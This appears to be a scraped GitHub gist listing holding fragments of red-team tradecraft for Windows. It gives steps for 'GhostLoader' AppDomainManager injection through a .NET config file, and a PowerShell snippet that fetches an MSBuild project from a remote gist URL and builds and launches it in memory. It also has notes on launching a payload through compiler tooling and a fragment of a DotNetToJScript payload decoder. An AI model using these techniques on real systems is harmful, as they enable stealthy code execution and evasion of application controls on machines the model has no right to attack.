GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
Leo Loobeek leoloobeek
leoloobeek
/ Build_In_Memory_CSharp_XSLT_Project.txt
Created
March 8, 2018 16:31
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| In-memory PowerShell XSLT project build: | |
| [Reflection.Assembly]::LoadWithPartialName('Microsoft.Build'); | |
| $proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj") | |
| $e=new-object Microsoft.Build.Evaluation.Project($proj); | |
| $e.build(); |
leoloobeek
/ Build_In_Memory_CSharp_Project.txt
Created
April 4, 2018 17:03
— forked from bohops/Build_In_Memory_CSharp_Project.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-) | |
| These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs. | |
| Basic gist after running PS script statements: | |
| - Loads C# project from file or web URL | |
| - Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"] | |
| - Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] | |
| - Launch program (payload) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-PublicKey | |
| { | |
| [OutputType([byte[]])] | |
| PARAM ( | |
| [Uri]$Uri | |
| ) | |
| if (-Not ($uri.Scheme -eq "https")) | |
| { | |
| Write-Error "You can only get keys for https addresses" |
leoloobeek
/ JScriptToDotnet.js
Created
November 28, 2018 18:50
Sample Extract Payload DotNetToJScript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Base64 Raw Decoder | |
| function Base64Decode(str) { | |
| if (!(/^[a-z0-9+/]+={0,2}$/i.test(str)) || str.length%4 != 0) throw Error('Not base64 string'); | |
| var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; | |
| var o1, o2, o3, h1, h2, h3, h4, bits, d=[]; | |
| for (var c=0; c<str.length; c+=4) { // unpack four hexets into three octets |
leoloobeek
/ _Instructions_Reproduce.md
Created
April 29, 2020 11:53
GhostLoader - AppDomainManager - Injection - 攻壳机动队
OlderNewer